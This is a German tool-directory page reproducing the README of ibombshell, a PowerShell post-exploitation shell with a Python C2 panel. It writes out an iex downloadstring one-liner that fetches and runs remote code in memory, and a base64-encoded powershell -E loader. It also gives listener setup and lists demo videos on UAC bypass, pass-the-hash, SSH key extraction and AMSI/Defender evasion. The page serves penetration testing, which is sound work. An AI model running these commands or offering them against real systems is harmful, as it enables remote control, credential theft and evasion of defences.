Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
ibombshell — Werkzeug zum jederzeitigen Bereitstellen einer Post-Exploitation-Eingabeaufforderung | Kitploit
Tools/GitHubGitHub/telefonica/ibombshell
Privilege EscalationPayload-GenerierungIDS/IPS-UmgehungPost-ExploitationPenetrationstestsCommand and ControlRed TeamingRemote-Access-Tool
GitHubtelefonica/ibombshell

ibombshell

Werkzeug zum jederzeitigen Bereitstellen einer Post-Exploitation-Eingabeaufforderung

Repository anzeigen
3217113vor 5 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Supported Python versions License

ibombshell - Dynamische Remote-Shell

root@kitploit:~
      ,--.!,    _ ____                  __   _____ __         ____
   __/   -*-   (_) __ )____  ____ ___  / /_ / ___// /_  ___  / / /
 ,d08b.  '|`  / / __  / __ \/ __ `__ \/ __ \\__ \/ __ \/ _ \/ / /
 0088MM      / / /_/ / /_/ / / / / / / /_/ /__/ / / / /  __/ / /
 `9MMP'     /_/_____/\____/_/ /_/ /_/_.___/____/_/ /_/\___/_/_/_/

 [+] Starting the console...
 [*] Console ready!

ibombshell ist ein in Powershell geschriebenes Tool, das Ihnen jederzeit einen Prompt mit Post-Exploitation-Funktionen (und in einigen Fällen Exploitation) bietet. Es ist eine Shell, die direkt in den Speicher heruntergeladen wird und Zugriff auf eine Vielzahl von Pentesting-Funktionen bietet. Diese Funktionen können direkt in den Speicher geladen werden, in Form einer Powershell-Funktion. Diese Ausführungsform wird als everywhere bezeichnet.

Darüber hinaus bietet ibombshell einen zweiten Ausführungsmodus namens Silently, sodass der Pentester eine Instanz von ibombshell (genannt warrior) ausführen kann. Der kompromittierte Computer wird über HTTP mit einem C2-Panel verbunden. Dadurch ist es möglich, den Warrior zu steuern und Funktionen in den Speicher zu laden, die dem Pentester helfen. Dies geschieht in der Post-Exploitation-Phase.

Voraussetzungen

Um ibombshell everywhere auszuführen, ist PowerShell 3.0 oder höher erforderlich. Für andere Betriebssysteme als Windows finden Sie weitere Informationen im PowerShell GitHub - PowerShell für jedes System!.

Um den ibombshell silently mode auszuführen, benötigen Sie Python 3.6 und einige Python-Bibliotheken. Sie können diese installieren mit:

root@kitploit:~
cd ibombshell\ c2/
pip install -r requirements.txt

Hinweis: ibombshell C2 funktioniert mit Python 3.X. Stellen Sie sicher, dass Sie ein pip relativ zu dieser Version verwenden.

Verwendung

ibombshell hat zwei Ausführungsmodi:

ibombshell everywhere

Um ibombshell zu laden, führen Sie einfach in PowerShell aus:

root@kitploit:~
iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/Telefonica/ibombshell/master/console’)

Jetzt können Sie die heruntergeladene ibombshell-Konsole ausführen mit:

root@kitploit:~
console

ibombshell everywhere in isolierten Umgebungen

Wenn Sie ibombshell in isolierten Umgebungen verwenden müssen, müssen Sie Ihren Computer zunächst in einer vernetzten Umgebung vorbereiten. Laden Sie alle benötigten Funktionen und verwenden Sie savefunctions, um sie in der Windows-Registrierung zu speichern.

Jetzt können Sie diesen Base-64-Code verwenden, um ibombshell zu erhalten:

root@kitploit:~
powershell.exe -E "JABwAGEAdABoACAAPQAgACcAaABrAGMAdQA6AFwAcwBvAGYAdAB3AGEAcgBlAFwAYwBsAGEAcwBzAGUAcwBcAGkAYgBvAG0AYgBzAGgAZQBsAGwAXABjAG8AbgBzAG8AbABlACcAOwAgAHQAcgB5ACAAewAJAGkAZgAoAHQAZQ
BzAHQALQBwAGEAdABoACAAJABwAGEAdABoACkAIAB7ACAAJABjAG8AbgBzAG8AbABlACAAPQAgACgARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACQAcABhAHQAaAApAC4ATgBhAG0AZQA7ACAAYwBkACAAaABrAGMAdQA6
ADsAIAAkAG4AYQBtAGUAIAA9ACAAJABjAG8AbgBzAG8AbABlAC4AcwBwAGwAaQB0ACgAIgBcACIAKQBbAC0AMQBdADsAIAAkAGMAbwBkAGUAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIAJABjAG
8AbgBzAG8AbABlACIAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAUAByAG8AcABlAHIAdAB5ACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUA
YwB0ACAAewBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAcABzAG8AYgBqAGUAYwB0ACAALQBQAHIAbwBwAGUAcgB0AHkAIABAAHsAIgBwAHIAbwBwAGUAcgB0AHkAIgA9ACQAXwA7ACAAIgBWAGEAbAB1AGUAIgAgAD0AIAAoAEcAZQ
B0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiACQAYwBvAG4AcwBvAGwAZQAiACAALQBOAGEAbQBlACAAJABfACkALgAkAF8AfQB9ACkALgBWAGEAbAB1AGUAOwAgACQAYwBvAGQAZQAgAHwAIABv
AHUAdAAtAHMAdAByAGkAbgBnACAAfAAgAGkAZQB4ADsAIABjADoAOwAgAGMAbwBuAHMAbwBsAGUAOwB9AH0AYwBhAHQAYwBoAHsAdwByAGkAdABlAC0AaABvAHMAdAAgACQARQByAHIAbwByAFsAMABdAH0A"

ibombshell silently mode

Diese Version ermöglicht es Ihnen, die ibombshell-Konsole auszuführen und sie über das in Python erstellte C2-Panel fernzusteuern. Um diese Version auszuführen, müssen Sie zuerst den Konsolenprozess in PowerShell starten:

root@kitploit:~
iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/Telefonica/ibombshell/master/console’)

Im ibombshell C2-Pfad bereiten Sie das C2 vor:

root@kitploit:~
python3 ibombshell.py

Und erstellen Sie den Listener, mit dem die Warriors verbunden werden:

root@kitploit:~
iBombShell> load modules/listener.py
[+] Loading module...
[+] Module loaded!
iBombShell[modules/listener.py]> run

Der Standard-Listener-Port ist 8080. Schließlich können Sie die Konsole im silently mode auf dem Host starten, um die Fernsteuerung zu erhalten:

root@kitploit:~
console -Silently -uriConsole http://[ip or domain]:[port]

ibombshell C2-Schema

Der grundlegende Betrieb des ibombshell-Kontrollpanels folgt folgendem Schema:

root@kitploit:~
        ibombshell                 C2
            |                      |
            |    newibombshell     |
            +--------------------->| --+ register
            |                      |<--+ from IP
            |    get functions     |
            |   and instructions   |
            +--------------------->|
            |                      |
            |    send functions    |
            |   and instructions   |
execute +-- |<---------------------+
        +-->|                      |
            |       results        |
            +--------------------->|
            |                      |

Docker

Wir haben einen Docker-Container erstellt, der alles enthält, was Sie benötigen, um es zum Laufen zu bringen. Führen Sie diesen Befehl vom Speicherort der Dockerfile aus.

root@kitploit:~
sudo docker build -t "ibombshell" .
sudo docker run -it ibombshell

Beispielvideos

Einige Beispielvideos...

iBombShell: PoC Warrior + UAC-Bypass + Pass the Hash

iBombShell: PoC Warrior + UAC-Bypass + Pass the Hash

iBombShell: macOS

iBombShell: macOS

ibombshell: Extrahieren privater SSH-Schlüssel unter Windows 10

ibombshell: Extrahieren privater SSH-Schlüssel unter Windows 10

iBombShell: PoC savefunctions

iBombShell: PoC savefunctions

ibombshell - Stiller UAC-Umgebungsinjektions-Bypass

ibombshell - Stiller UAC-Umgebungsinjektions-Bypass

iBombShell - Mocking Trusted Directory

iBombShell - Mocking Trusted Directory

iBombShell - DLL-Generierung

iBombShell - DLL-Generierung

iBombShell - AMSI & Windows Defender Bypass

iBombShell - AMSI & Windows Defender Bypass

Lizenz

Dieses Projekt ist unter der GNU General Public License lizenziert - siehe LICENSE-Datei für Details.

Kontakt

DIE SOFTWARE WIRD "WIE BESEHEN" ZUR VERFÜGUNG GESTELLT, OHNE JEGLICHE AUSDRÜCKLICHE ODER STILLSCHWEIGENDE GEWÄHRLEISTUNG, EINSCHLIESSLICH, ABER NICHT BESCHRÄNKT AUF DIE GEWÄHRLEISTUNG DER MARKTGÄNGIGKEIT, DER EIGNUNG FÜR EINEN BESTIMMTEN ZWECK UND DER NICHTVERLETZUNG VON RECHTEN. IN KEINEM FALL HAFTEN DIE AUTOREN ODER RECHTSINHABER FÜR JEGLICHE ANSPRÜCHE, SCHÄDEN ODER ANDERE VERBINDLICHKEITEN, OB AUS VERTRAG, UNERLAUBTER HANDLUNG ODER ANDERWEITIG, DIE AUS ODER IM ZUSAMMENHANG MIT DER SOFTWARE ODER DER NUTZUNG ODER ANDEREN HANDLUNGEN MIT DER SOFTWARE ENTSTEHEN. WENN SIE EINEN BEITRAG ZU EINEM REPOSITORIUM LEISTEN, DAS EINEN LIZENZHINWEIS ENTHÄLT, LIZENZIEREN SIE IHREN BEITRAG UNTER DEN SELBEN BEDINGUNGEN UND SIND SIE DAmit EINVERSTANDEN, DASS SIE DAS RECHT HABEN, IHREN BEITRAG UNTER DIESEN BEDINGUNGEN ZU LIZENZIEREN. FALLS SIE EINE SEPARATE VEREINBARUNG ZUR LIZENZIERUNG IHRER BEITRÄGE UNTER ANDEREN BEDINGUNGEN HABEN, WIE ZUM BEISPIEL EINE CONTRIBUTOR LICENSE AGREEMENT, HAT DIESE VEREINBARUNG VORRANG.

Diese Software hat keinen QA-Prozess. Diese Software ist ein Proof of Concept.

Bei Problemen können Sie uns kontaktieren:

[email protected]

Tool herunterladen